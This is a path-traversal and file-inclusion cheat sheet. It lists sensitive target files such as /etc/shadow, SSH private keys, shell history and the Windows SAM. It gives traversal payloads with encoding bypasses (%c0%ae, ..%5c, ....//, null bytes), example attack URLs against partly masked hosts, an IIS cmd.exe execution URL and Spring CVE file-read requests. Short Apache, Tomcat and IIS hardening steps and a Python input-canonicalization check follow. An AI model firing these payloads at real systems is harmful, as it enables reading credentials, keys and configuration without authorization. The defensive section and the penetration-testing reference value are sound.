File list
1. C:\WINDOWS\system32\drivers\etc\hosts #Win10
2. C:\boot.ini #Win7 hidden file
3. web.xml #Java web project configuration file, /WEB-INF/web.xml
4. C:\Program Files\mysql\my.ini #MySQL configuration file
5. /etc/passwd
6. /etc/hosts
7. /etc/group
8. /etc/shadow
9. /.htaccess
10. /phpinfo.php
11. /inc/db.php
12. /inc/conn.php
13. /Windows/system.ini
Tomcat
1./%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
Windows + IIS + asp
1. http://test.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c: #old versions - IIS CGI filename decoding vulnerability
2. http://test.com/show.asp?view=../../../../../Windows/system.ini
Path list
(1)/../../../../../../../../../../../../../../../../../etc/passwd%00
(2)../../../../../../../../../../../../../../etc/passwd%00
(3)http://xx.xx.com/en/..\..\..\..\..\..\..\..\..\..\/etc/sysconfig/network-scripts/ifcfg-eth1
(4)../../../../../../../../../../etc/passwd
(5)....//....//static/xx.php%00.png
../../../WEB-INF/web.xml
../../../../../../etc/passwd
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
D:\inetpub\wwwroot\global.asa
D:/inetpub/wwwroot/global.asa
(1)xx.php?vt=&cate=/../../../../../../../../../../../../../../../../../etc/passwd%00
(2)http://xx.xx.com/doc/index?md=diagnose_api&app=../../../../../../../../../../../../../../etc/passwd%00
(3)http://xx.xx.com/en/..\..\..\..\..\..\..\..\..\..\/etc/sysconfig/network-scripts/ifcfg-eth1
(4)http://xx.xx.xx.xx/pcheck/index.php?action=showPcheck&report=../../../../../../../../../../etc/passwd
(5)http://xx.xx.com/xx/img.php?s=16,40&n=....//....//static/xx.php%00.png
http://2xx.xx.xx.xx:8080/xampp/showcode.php/c:xampp/htdocs/xampp/showcode.php?showcode=1
https://xx.xx.com/static/images/couch-ipad.png../../../../../../../etc/passwd
http://gmu.xx.com/demo/data/tabs/proxy.php?debug=1&key=&file=file:///etc/hosts
http://gmu.xx.com/demo/data/tabs/proxy.php?debug=1&key=&file=file:///etc/passwd
http://xx.xx.com/frame_scc/downLoad?template=../../../../../../../../../etc/passwd
http://xx.12.22.xx/downloadFile.do?fileName=/../../../../../../../etc/passwd
CVE-2014-3625
http://218.2.197.XX:18015/spring-css/resources/file:/etc/passwd
http://218.2.197.XX:18015/spring-css/resources/file:/etc/flag
CVE-2018-1271
Path traversal detection:
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/known_hosts
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]* (file descriptor)
/proc/mounts
/proc/config.gz
/etc/my.cnf
C:\Program Files\mysql\data\mysql\user.MYD
C:\Windows\php.ini
C:\Windows\my.ini
C:\boot.ini
C:\Windows\System32\inetsrv\MetaBase.xml
C:\Windows\repair\sam
../../ierp/bin/prop.xml
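Defense
Apache
In httpd.conf, find Options +Indexes +FollowSymLinks +ExecCGI, change it to Options -Indexes +FollowSymLinks +ExecCGI, and save.
Tomcat
Edit conf/web.xml, change true to false, then restart Tomcat.
IIS
1. On the server, open Control Panel --> Administrative Tools --> IIS Manager.
2. Right-click Default Web Site --> Properties --> Home Directory --> clear the "Directory browsing" checkbox.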
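
A server-side check for the encodings listed in the path sections above (%c0%ae, ..%5c, ....//, %00, file:), as an added example that is not part of the original page: decode the parameter to a fixed point, then accept it only if the normalized path stays under the served directory. BASE and the function names are assumptions made for the illustration.

```python
import posixpath
import re
from urllib.parse import unquote

BASE = "/var/www/static"  # assumed document root (hypothetical)

# Overlong UTF-8 forms of '.' and '/' that lenient decoders accept
OVERLONG = {"%c0%ae": ".", "%c0%af": "/"}
SCHEME_OR_DRIVE = re.compile(r"^[a-z][a-z0-9+.-]*:", re.I)  # file:, c:, http:


def naive_strip(raw):
    """The weak filter that '....//' defeats: one pass removing '../'."""
    return raw.replace("../", "")


def canonicalize(raw):
    """Decode to a fixed point so nested encodings cannot hide '..'."""
    prev, cur = None, raw
    while prev != cur:
        prev = cur
        for enc, ch in OVERLONG.items():
            cur = re.sub(enc, ch, cur, flags=re.I)
        cur = unquote(cur)
    return cur.replace("\\", "/")  # treat ..\ like ../


def safe_resolve(raw, base=BASE):
    """Return the path under base, or None when the request must be rejected."""
    path = canonicalize(raw)
    if "\x00" in path:  # %00 truncation
        return None
    if SCHEME_OR_DRIVE.match(path):
        return None
    # Lexical check only; on a real filesystem resolve symlinks as well
    # (os.path.realpath) before comparing against the base directory.
    full = posixpath.normpath(posixpath.join(base, path.lstrip("/")))
    if full != base and not full.startswith(base + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed inputs, using parameter values listed on this page
    for raw in ["images/couch-ipad.png", "....//....//static/xx.php%00.png",
                "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd",
                "..%5c../Windows/system.ini", "file:///etc/hosts"]:
        print(f"{raw!r:60} -> {safe_resolve(raw)}")
```

naive_strip is included only to show why a single-pass removal of "../" is not a fix: it turns "....//" back into "../", which safe_resolve still rejects.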